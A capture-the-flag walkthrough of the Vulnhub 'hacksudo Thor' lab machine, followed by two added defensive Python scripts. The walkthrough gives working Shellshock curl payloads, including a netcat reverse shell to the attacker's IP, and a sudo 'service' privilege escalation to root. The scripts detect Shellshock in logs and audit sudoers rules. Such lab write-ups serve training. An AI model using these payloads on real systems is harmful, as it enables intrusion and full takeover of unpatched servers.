Vulnhub range hacksudo Thor
2022-07-01 17:02:00 【KALC】
1. Target information
Target name: hacksudo - Thor
Difficulty: intermediate
Virtual machine environment: VirtualBox is recommended for this target
Goal: obtain root privileges
Target download: https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
Kali (attacker) IP: 192.168.2.172
Target machine IP: 192.168.2.175
2. Host discovery
2.1 Run an nmap ping sweep of the subnet the target sits on; the MAC address identifies the target's IP as 192.168.2.175
nmap -sn 192.168.2.0/24
2.2 Full port scan of the target
nmap -p- 192.168.2.175
2.3 Service version scan of the open ports
nmap -p 21,22,80 -sV 192.168.2.175
2.4 Browsing to port 80 shows a login page
3. Web directory enumeration
3.1 Scan directories directly, looking for sensitive information
dirsearch -u http://192.168.2.175 -e *
3.2 Among the discovered paths, the first interesting one is a markdown file that contains the code author's GitHub address
192.168.2.175/README.md
3.3 An images directory is also found, but it contains nothing useful
3.4 Another login page is found, but since we have no credentials yet it is left for now
http://192.168.2.175/index.php/login/
4. Open source code leak
4.1 Visit the source code publishing address found above to check whether it exposes anything sensitive: https://github.com/zakee94/
4.2 Visit https://github.com/zakee94/online-banking-system
The account found there is admin, the password is password123
4.3 Trying these on the port 80 login page gives an "invalid authentication" prompt
4.4 In the source files we find an admin_login.php page
4.5 Accessing this administrator page and logging in with the credentials above succeeds
http://192.168.2.175/admin_login.php
4.6 After logging in, account management and other operations are available
5. Shellshock
5.1 Looking at the source of news.php, one item references cgi-bin. The earlier web directory scan also turned up a cgi-bin directory, which deserves attention: there may be a Shellshock vulnerability
5.2 Use dirsearch to crawl /cgi-bin, looking for files ending in cgi and sh. Two are found: /cgi-bin/backup.cgi and /cgi-bin/shell.sh
dirsearch -u http://192.168.2.175/cgi-bin/ -f -e cgi,sh
5.3 Use the nmap Shellshock script for detection; backup.cgi is reported as vulnerable
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.2.175
5.4 Run the same nmap script against shell.sh; it is also vulnerable
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 192.168.2.175
5.5 Using curl, put the Shellshock payload in the User-Agent header; the command output is echoed back
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" http://192.168.2.175/cgi-bin/backup.cgi
5.6 Check whether the nc command exists on the target; it does, so a reverse shell can be obtained directly
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'which nc'" http://192.168.2.175/cgi-bin/backup.cgi
5.7 First start a listener on Kali, then send the reverse shell payload from Kali through the Shellshock vulnerability to obtain a shell
curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.2.172 9999'" http://192.168.2.175/cgi-bin/backup.cgi
5.8 The shell arrives successfully; the user is www-data. The next step is privilege escalation
nc -nvlp 9999
5.9 Use python to upgrade to an interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
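As an added example (not part of the original walkthrough), a defender-side check for section 5: the curl requests above leave the "() {" function-definition marker in the web server's access log, and this script parses combined-format log lines and flags entries that carry it in the User-Agent or Referer. The log lines are constructed to mirror the requests above, not taken from the target.

```python
import re
from typing import Dict, List

# Apache/nginx "combined" format: ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock (CVE-2014-6271 family) marker: a bash function definition "() {" arriving in a
# header that the web server exports into a CGI script's environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample log (modelled on steps 5.5 and 5.6 above, plus two benign requests).
SAMPLE_LOG = """\
192.168.2.172 - - [01/Jul/2022:17:02:00 +0800] "GET /cgi-bin/backup.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo;echo;/bin/bash -c 'id'"
192.168.2.172 - - [01/Jul/2022:17:02:05 +0800] "GET /cgi-bin/backup.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo;echo;/bin/bash -c 'which nc'"
192.168.2.50 - - [01/Jul/2022:17:03:10 +0800] "GET /index.php/login/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.2.50 - - [01/Jul/2022:17:04:00 +0800] "GET /cgi-bin/shell.sh HTTP/1.1" 200 40 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

def parse_line(line: str) -> Dict[str, str]:
    """Parse one combined-format line into its fields; empty dict if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}

def find_shellshock_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return the parsed entries whose User-Agent or Referer carries the Shellshock marker.
    A plain request to a CGI path without the marker is not flagged."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(entry[field]):
                entry["flagged_header"] = field
                hits.append(entry)
                break
    return hits

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['path']} via {hit['flagged_header']}: {hit['ua']!r}")
```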
6. Privilege escalation with GTFOBins
6.1 Check the current user's sudo permissions; there is a script that can be executed as thor without a password
6.2 Run the script as thor. It first asks for thor's key, where any value can be entered; after pressing Enter to confirm, it asks for a secret message. Entering the command id here shows that the command is executed and that the current user is thor
sudo -u thor /home/thor/./hammer.sh
6.3 Use the script to escalate to thor: at the secret message prompt (Secret massage), enter bash, and we have a shell as thor
6.4 Check thor's sudo permissions: the cat command may be run as root, and so may the service command. The service command can be used directly to reach root. Where sudo commands are misconfigured or left unrestricted, escalation methods can be looked up on this site: GTFOBins
sudo service ../../bin/bash
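As an added example (not part of the original walkthrough), the audit a defender would run against section 6: parse sudoers-style rules and flag the two binaries the walkthrough shows thor running as root, with the GTFOBins reasoning for each. The sudoers fragment is constructed from the rules described above, not copied from the target; the hammer.sh rule is deliberately not flagged, since its danger lies in the script's contents, which a sudoers audit cannot see.

```python
import re
from typing import Dict, List

# Why each binary matters when granted via sudo (the usual GTFOBins classification):
# "service" executes whatever path it is handed as the service name, so a passwordless
# rule for it is a root shell; "cat" lets the caller read any file root can read.
RISKY_SUDO_BINARIES = {
    "service": "runs an arbitrary path given as the service name (root shell via ../../bin/bash)",
    "cat": "reads any root-readable file (e.g. /etc/shadow, SSH keys)",
}

# Constructed sudoers fragment (assumption: modelled on the rules reported above).
SAMPLE_SUDOERS = """\
# constructed example, not the target's real /etc/sudoers
www-data ALL=(thor) NOPASSWD: /home/thor/hammer.sh
thor ALL=(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
root ALL=(ALL:ALL) ALL
"""

# user host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]+)\)\s+'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)

def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """One finding per rule granting a known-dangerous binary, or ALL without a password."""
    findings: List[Dict[str, object]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        m = RULE_RE.match(line) if line else None
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            name = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the binary (or "ALL")
            reason = RISKY_SUDO_BINARIES.get(name)
            if name == "ALL" and nopasswd:
                reason = "any command as %s without a password" % m.group("runas")
            if reason:
                findings.append({"user": m.group("user"), "runas": m.group("runas"),
                                 "command": cmd, "nopasswd": nopasswd, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']} -> {f['runas']}: {f['command']} NOPASSWD={f['nopasswd']}: {f['reason']}")
```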